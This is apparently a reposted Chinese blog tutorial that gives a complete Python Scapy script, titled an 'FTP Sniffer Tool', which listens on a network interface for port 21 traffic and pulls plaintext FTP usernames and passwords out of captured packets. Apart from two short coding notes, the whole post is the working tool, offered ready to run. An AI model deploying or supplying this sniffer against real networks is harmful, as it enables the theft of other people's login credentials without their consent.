利用Python的Scapy模块实现FTP服务器用户名密码的截取
作者:互联网
注意事项:
1. 在sniff中的自定义回调函数packet_handler需要捕捉异常,因为输入的参数pkt会出现None的情况,会因此异常;
2. 本实例中编写了两个列表,存放常见的用户名以及密码的字段,因为对于每个ftp应用可能该字段名称会有所区别,需要遍历这两个列表,不过一旦发现有匹配,则退出相关的循环。
from scapy.all import * import optparse import sys import re import termcolor def banner(): banner = """ ****************************************************************** ****************************************************************** FTP Sniffer Tool by Jason Wong V1.0 ****************************************************************** ****************************************************************** """ print(banner) def get_params(): parser = optparse.OptionParser('Usage: <Program> -i interface') parser.add_option('-i', '--interface', dest='interface', type='string', help='Specity interface to listen on ') options, args = parser.parse_args() if options.interface is None: print(parser.usage) sys.exit(0) return options.interface class FTPSniffer: def __init__(self,interface): self.interface = interface self.userlist = ['User', 'Username','username', 'user','USER'] self.passwdlist = ['Password', 'password', 'pass', 'Pass', 'passwd', 'Passwd','PASS'] def packet_handler(self,pkt): try: destination_ip = pkt.getlayer(IP).dst source_ip = pkt.getlayer(IP).src print("Capturing FTP login traffic to : %s from : %s" % (destination_ip, source_ip)) if pkt.getlayer(Raw): raw_data = pkt.getlayer(Raw).load.decode('utf-8') # print(raw_data) for each_word in self.userlist: res = re.findall(r'(?i)%s (.*)' % each_word, raw_data) if res: print(termcolor.colored("Username: %s" % res[0],'blue')) break for each_word in self.passwdlist: res = re.findall(r'(?i)%s (.*)' % each_word, raw_data) if res: print(termcolor.colored("Password: %s" % res[0],'blue')) break except: pass def run(self): try: sniff(filter='tcp port 21', prn=self.packet_handler, iface=self.interface) except KeyboardInterrupt: print("Existing the program!") sys.exit() if __name__ == "__main__": banner() interface = get_params() ftpsniffer = FTPSniffer(interface) ftpsniffer.run()
标签:__,FTP,pkt,Python,res,self,Scapy,print,interface 来源: https://www.cnblogs.com/jason-huawen/p/16197889.html